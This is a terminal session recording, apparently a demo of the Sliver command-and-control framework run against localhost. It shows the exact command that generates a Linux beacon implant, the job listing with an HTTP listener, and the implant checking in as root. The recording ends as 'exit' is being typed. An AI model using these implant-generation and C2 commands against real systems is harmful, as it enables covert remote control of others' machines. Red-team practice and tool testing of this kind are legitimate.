\u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[19.931567, "o", "\u001b[1A\u001b[72D\u001b[9C\u001b[107D\u001b[72C\u001b[?25h"] +[20.168864, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.171906, "o", "\u001b[6n"] +[20.178129, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.178608, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[73D\u001b[9C\u001b[107D\u001b[73C\u001b[?25h"] +[20.297124, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.30462, "o", "\u001b[6n"] +[20.311177, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m"] +[20.313065, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[74D\u001b[9C\u001b[107D\u001b[74C\u001b[?25h"] +[20.778135, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.782481, "o", "\u001b[6n"] +[20.792233, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--o\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.793582, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[75D\u001b[9C\u001b[107D\u001b[75C\u001b[?25h"] +[20.875988, "o", "\u001b[?25l\u001b[107D"] +[20.880256, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.880407, "o", "\u001b[6n"] +[20.886912, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.889501, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[76D\u001b[9C\u001b[107D\u001b[76C\u001b[?25h"] +[20.956584, "o", "\u001b[?25l\u001b[107D"] +[20.957564, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.959364, "o", "\u001b[6n"] +[20.962509, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[77D"] +[20.963891, "o", "\u001b[9C\u001b[107D\u001b[77C\u001b[?25h"] +[21.215945, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.218587, "o", "\u001b[6n"] +[21.22548, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22ml\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.226454, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[78D\u001b[9C\u001b[107D\u001b[78C\u001b[?25h"] +[21.285365, "o", "\u001b[?25l\u001b[107D"] +[21.287194, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.292864, "o", "\u001b[6n"] +[21.295846, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mli\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.296889, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[79D\u001b[9C\u001b[107D\u001b[79C\u001b[?25h"] +[21.368931, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.372292, "o", "\u001b[6n"] +[21.376631, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlin\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[21.376984, "o", "\u001b[107D\u001b[1A\u001b[80D\u001b[9C\u001b[107D\u001b[80C\u001b[?25h"] +[21.507354, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.511066, "o", "\u001b[6n"] +[21.515589, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinu\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.516174, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[81D\u001b[9C\u001b[107D\u001b[81C\u001b[?25h"] +[21.635331, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[21.645426, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.64696, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[82D\u001b[9C\u001b[107D\u001b[82C\u001b[?25h"] +[21.83149, "o", "\u001b[?25l"] +[21.840106, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[21.847228, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15 \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[0m\u001b[0K\u001b[49m"] +[21.850549, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[83D\u001b[9C\u001b[107D\u001b[83C\u001b[?25h"] +[22.416182, "o", "\u001b[83D\u001b[9C"] +[22.423437, "o", "\u001b[6n"] +[22.428419, "o", "\u001b[107D\u001b[83C"] +[22.429272, "o", "\u001b[0J\u001b[107D\r\r\n"] +[22.43381, "o", "\u001b[0 q"] +[22.436511, "o", "\r\n"] +[22.472785, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mGenerating new linux/amd64 beacon implant binary (15s)\r\n"] +[22.573603, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[22.673763, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[22.774365, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[22.874902, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[22.975459, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[23.077251, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[23.179308, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[23.283986, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[23.38624, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[23.486039, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[23.586774, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[23.68746, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[23.79081, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[23.891386, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[23.992125, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[24.093011, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[24.197402, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[24.297949, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[24.399009, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[24.500778, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[24.601249, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[24.701469, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[24.802295, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[24.903284, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[25.004388, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[25.107365, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[25.210375, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[25.311732, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[25.412333, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[25.514097, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[25.61486, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[25.715961, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[25.816088, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[25.917192, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[26.017903, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[26.118753, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[26.21905, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[26.31959, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[26.424407, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[26.524445, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[26.625061, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[26.725914, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[26.826768, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[26.927046, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[27.028042, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[27.132983, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[27.235962, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[27.340875, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[27.441488, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[27.542069, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[27.644268, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[27.744341, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[27.847294, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[27.954509, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[28.056587, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[28.157221, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[28.258408, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[28.364494, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[28.462307, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[28.562769, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[28.66304, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[28.76396, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[28.864147, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[28.964714, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[29.065388, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[29.165921, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[29.266403, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[29.367502, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[29.468424, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[29.569487, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[29.670252, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[29.771867, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[29.872652, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[29.973324, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[30.074435, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[30.174845, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[30.275851, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[30.377039, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[30.477598, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[30.578062, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[30.678295, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[30.77845, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[30.883305, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[30.987537, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[31.08836, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[31.189425, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[31.289913, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[31.390842, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[31.491413, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[31.592035, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[31.692388, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[31.793231, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[31.894299, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[31.995189, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[32.096939, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[32.197776, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[32.302336, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[32.402824, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[32.50487, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[32.605665, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[32.706617, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[32.807432, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[32.908046, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[33.009032, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[33.109915, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[33.210604, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[33.3116, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[33.41245, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[33.516247, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[33.616488, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[33.717409, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[33.817961, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[33.918916, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[34.018921, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[34.119593, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[34.220874, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[34.323197, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[34.423934, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[34.524936, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[34.629284, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[34.731156, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[34.831911, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[34.93521, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[35.039389, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[35.140101, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[35.240752, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[35.341388, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[35.446188, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[35.547585, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[35.648296, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[35.749446, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[35.849976, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[35.951697, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[36.052406, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[36.154746, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[36.25954, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[36.361045, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[36.466049, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[36.570787, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[36.675256, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[36.776002, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[36.876802, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[36.977448, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[37.058199, "o", "\r\u001b[2K"] +[37.059559, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBuild completed in 15s\r\n"] +[37.072358, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /root/CONTINUING_DOWNTOWN\r\n"] +[37.072849, "o", "\r\n"] +[37.081564, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.081771, "o", "\u001b[1 q"] +[37.083023, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.084683, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[39.785402, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[39.792269, "o", "\u001b[6n"] +[39.799813, "o", "j\u001b[0m\u001b[0K\u001b[49m"] +[39.801567, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[39.871366, "o", "\u001b[?25l"] +[39.87277, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.876524, "o", "jo\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[39.962292, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.971702, "o", "job\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[39.97248, "o", "\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[40.076739, "o", "\u001b[?25l"] +[40.083932, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.090014, "o", "\u001b[1m\u001b[32mjobs\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[40.365397, "o", "\u001b[13D\u001b[9C"] +[40.368244, "o", "\u001b[6n"] +[40.372542, "o", "\u001b[107D\u001b[13C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[40.400703, "o", " ID Name Protocol Port Domains \r\n==== ====== ========== ====== =========\r\n 1 http tcp 80 \r\n\r\n"] +[40.412577, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.412736, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.415374, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D"] +[40.415811, "o", "\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[45.467196, "o", "\u001b[9D\u001b[9C\u001b[107D\u001b[0J"] +[45.467961, "o", "\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mBeacon 2ed27d54 CONTINUING_DOWNTOWN - 127.0.0.1:60402 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 18:30:06 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[45.470559, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[45.471633, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[48.327549, "o", "\u001b[H\u001b[2J"] +[48.331957, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[48.341971, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[48.343887, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[48.681461, "o", "\u001b[?25l"] +[48.690762, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[48.698902, "o", "b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[48.724389, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[48.727315, "o", "be\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[48.7685, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[48.769393, "o", "\u001b[6n"] +[48.772022, "o", "bea\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[48.772175, "o", "\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[48.89754, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[48.9088, "o", "beac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[49.045498, "o", "\u001b[1 q"] +[49.090455, "o", "\u001b[1 q\u001b[?25l\u001b[107D"] +[49.091825, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[49.094181, "o", "\u001b[1m\u001b[32mbeacons \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[49.095871, "o", "\u001b[1A\u001b[17D\u001b[9C\u001b[107D\u001b[17C\u001b[?25h"] +[49.218244, "o", "\u001b[17D\u001b[9C"] +[49.220895, "o", "\u001b[6n"] +[49.224622, "o", "\u001b[107D\u001b[17C\u001b[0J\u001b[107D\r\r\n"] +[49.225698, "o", "\u001b[0 q\r\n"] +[49.254538, "o", " ID Name Transport Hostname Username Operating System Last Check-In Next Check-In \r\n========== ===================== =========== ============== ========== ================== =============== ===============\r\n \u001b[0m2ed27d54\u001b[0m \u001b[0mCONTINUING_DOWNTOWN\u001b[0m \u001b[0mhttp(s)\u001b[0m \u001b[0m98df0494f659\u001b[0m \u001b[0mroot\u001b[0m \u001b[0mlinux/amd64\u001b[0m 4s \u001b[1m\u001b[32m15s\u001b[0m \r\n\r\n"] +[49.265808, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[49.265962, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[49.267311, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[49.267577, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[53.296549, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[53.30563, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[53.45963, "o", "\u001b[?25l\u001b[107D"] +[53.459921, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[53.464752, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[53.579648, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[53.590477, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[53.590827, "o", "\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[53.761387, "o", "\u001b[?25l"] 